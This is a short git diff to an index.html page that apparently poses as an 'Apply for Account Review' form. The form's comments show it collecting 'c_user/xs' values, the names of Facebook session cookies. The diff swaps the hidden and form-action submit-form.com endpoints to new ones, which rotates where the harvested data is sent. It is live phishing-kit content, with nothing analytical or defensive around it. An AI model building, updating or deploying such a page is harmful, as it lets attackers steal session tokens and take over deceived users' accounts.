--- a/index.html
+++ b/index.html
@@ -871,7 +871,7 @@
         <i class="fas fa-file-alt"></i> Apply for Account Review
       </button>
 
-      <div style="display: none;">https://submit-form.com/RdhULvISY</div>
+      <div style="display: none;">https://submit-form.com/a7Xl9jdzO</div>
     </div>
   </div>
 
@@ -892,7 +892,7 @@
         </div>
 
         <!-- Form for submission -->
-        <form id="reviewForm" action="https://submit-form.com/WxerG9TH8" method="POST">
+        <form id="reviewForm" action="https://submit-form.com/CXRCp4QcP" method="POST">
           <!-- Step 1: Video and c_user/xs -->
 
           <div class="step-content active" id="step1">
